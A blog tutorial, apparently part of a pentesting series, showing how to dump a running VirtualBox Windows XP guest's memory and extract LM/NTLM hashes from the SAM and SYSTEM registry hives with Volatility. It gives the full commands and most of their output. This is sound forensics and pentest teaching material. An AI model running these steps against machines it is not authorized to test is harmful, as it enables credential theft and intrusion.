Windows Credentials and Memory Dumps – Part 5: Virtualbox & LM/NTLM Hashes

For this part I’m using the standalone version of volatility for windows. The goal is dumping LM/NTLM hashes from a  windows memory image.
When you have access to a host where virtual machines are running, but you do not have acces to the VMs itself, one possibility is to reboot the VM but starting an ISO and resetting or stealing the password that way. Of course this is very noisy and for a pentester there are better ways. With virtualbox you can dump the memory during runtime.
For this test I am running an old Windows XP SP2 box with virtualbox. The host system is running Windows 8.1.
Dump the memory:
C:\Program Files\Oracle\VirtualBox>vboxmanage debugvm “WinXP_1” dumpvmcore –filename c:\Users\dax\Downloads\\test.elf
From here it is the usual steps:
C:\Users\dax\Downloads\\>volatility-2.4.standalone.exe imageinfo -f test.elf
Volatility Foundation Volatility Framework 2.4
Determining profile based on KDBG search…
          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                     AS Layer1 : IA32PagedMemory (Kernel AS)
                     AS Layer2 : OSXPmemELF (Unnamed AS)
                     AS Layer3 : FileAddressSpace (C:\Users\dax\Downloads\volati\\test.elf)
                      PAE type : No PAE
                           DTB : 0x39000L
                          KDBG : 0x8054cde0L
          Number of Processors : 1
     Image Type (Service Pack) : 3
                KPCR for CPU 0 : 0xffdff000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2016-01-22 10:11:07 UTC+0000
     Image local date and time : 2016-01-22 11:11:07 +0100
C:\Users\dax\Downloads\\>volatility-2.4.standalone.exe hivelist -f test.elf –profile WinXPSP2x86
Volatility Foundation Volatility Framework 2.4
Virtual    Physical   Name
———- ———- —-
0xe1064380 0x043bf380 \??\C:\Dokumente und Einstellungen\x\Lokale Einstellungen\
0xe1078b60 0x04492b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\x\NTUS
0xe1b4bb60 0x1c5c0b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\LocalS
ervice\Lokale Einstellungen\Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe1ca9b60 0x1c562b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\LocalS
0xe19f9b60 0x1bf35b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\Networ
kService\Lokale Einstellungen\Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe19a77b0 0x1bb727b0 \Device\HarddiskVolume1\Dokumente und Einstellungen\Networ
0xe186f008 0x1c113008 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe1875b60 0x1c11eb60 \Device\HarddiskVolume1\WINDOWS\system32\config\default
0xe187d008 0x1c135008 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe186fb60 0x1c113b60 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
0xe13cd008 0x02c2c008 [no name]
0xe1035b60 0x028d2b60 \Device\HarddiskVolume1\WINDOWS\system32\config\system
0xe102e008 0x028cc008 [no name]
For retreiving the hashes two values are needed in the next step
y=virtual location of system
s=virtual location of sam
C:\Users\dax\Downloads\\>volatility-2.4.standalone.exe hashdump -f test.elf –profile WinXPSP2x86 -y 0xe1035b60 -s 0xe187d008
Volatility Foundation Volatility Framework 2.4

One thought on “Windows Credentials and Memory Dumps – Part 5: Virtualbox & LM/NTLM Hashes

  1. Pingback: Memdumps, Volatility, Mimikatz, VMs – Overview | govolution

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s